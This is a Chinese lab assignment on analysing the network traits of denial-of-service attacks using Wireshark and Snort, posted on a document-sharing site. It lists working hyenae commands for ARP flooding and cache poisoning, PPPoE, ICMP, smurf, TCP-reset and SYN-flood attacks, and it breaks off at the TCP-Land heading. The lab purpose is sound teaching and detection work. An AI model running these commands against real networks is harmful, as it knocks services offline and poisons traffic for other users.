拒绝服务攻击特征分析
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
拒绝服务攻击特征分析
本次实验包括如下分析要求
(1)利用hyenae-0.36-1_fe_0.1-1-win32 攻击工具进行拒绝服务的实验,该包是一个拒绝服务攻击的集合,攻击时通过通过wireshark界面抓图说明不同拒绝服
务攻击的网络特征,然后总结拒绝服务攻击发现的方法,并设置一个snort
检测网络扫描的规则,并测试效果(抓图说明)。
(2)攻击类型如下
1 ARP-Request Flood
This example will send an unlimited amount of ARP-Request packets from a
random source to all available machines on the network.
# hyenae -I 1 -a arp-request -s % -d ff:ff:ff:ff:ff:ff \
# -S %-% -D 00:00:00:00:00:00-192.168.0.1
NOTE:
The hardware address strip of the source and the sender address pattern
will be equaly randomized to avoid corrupt packets.
2 ARP-Cache Poisoning
This example will send an ARP-Reply packet from a fictional source address
to all available machines on the network.
# hyenae -I 1 -a arp-reply -s 00:f0:21:03:c6:00 -d ff:ff:ff:ff:ff:ff \
# -S 11:22:33:44:55:66-192.168.0.1 -D ff:ff:ff:ff:ff:ff-0.0.0.0 -c 1
4 Blind PPPoE Session Initiation Flood
This example sends and inlimited amount of PPPoE-DIscovery packets with
set PADI flag and an incrementing session id from a random source address to
all available machines on the network.
# hyenae -I 1 -a pppoe-discover -o padi -s % -d ff:ff:ff:ff:ff:ff
5 Blind PPPoE Session Termination
This example sends and inlimited amount of PPPoE-DIscovery packets with
set PADT flag and an incrementing session id from an existing source adress
to an existing destination address.
# hyenae -I 1 -a pppoe-discover -o padt -s 11:22:33:44:55:66 \
# -d 44:55:66:77:88:99 -q 1 -Q 1
6 ICMP-Echo Flood
This example will send a random amount of ICMP-Echo packets between 1 and 10000 from a random source to a fictional target.
# hyenae -I 1 -a icmp-echo -s %-% -d 00:f0:21:03:c6:00-192.168.0.1 \
# -c 1 -C 10000
7 ICMP-Smurf Attack
This example will send an unlimited amount of ICMP-Echo packets from an existing source address against a network broadcast address.
# hyenae -I 1 -a icmp-echo -s 00:f0:21:03:c6:00-192.168.0.1 \
# -d ff:ff:ff:ff:ff:ff-255.255.255.255
8 ICMP Based TCP-Connection Reset
This example will send a single ICMP "Destination Unreachable" packet with the message code "Port unreachable", from a fictional source to a fictional target. The secondary source and destination patterns are used to set the
source and dstination of the TCP packet that is attached at the end of the
ICMP packet.
# hyenae -I 1 -a icmp-unreach-tcp -o port \
# -s 00:c0:33:d4:03:06-192.168.0.2 \
# -d 00:f0:21:03:c6:00-192.168.0.1 \
# -S 00:c0:33:d4:03:06-192.168.0.2@1093 \
# -D 00:f0:21:03:c6:00-192.168.0.1@21 \
# -C 1
9 TCP-SYN Attack
This example will send an unlimited amount of TCP packets with set SYN flag, from a random source to a fictional target, with a random send delay between
1 and 1000 milliseconds.
# hyenae -I 1 -a tcp -f s -s %-%@%%%% -d 00:f0:21:03:c6:00-192.168.0.1@21 \ # -e 1 -E 1000
10 TCP-Land Attack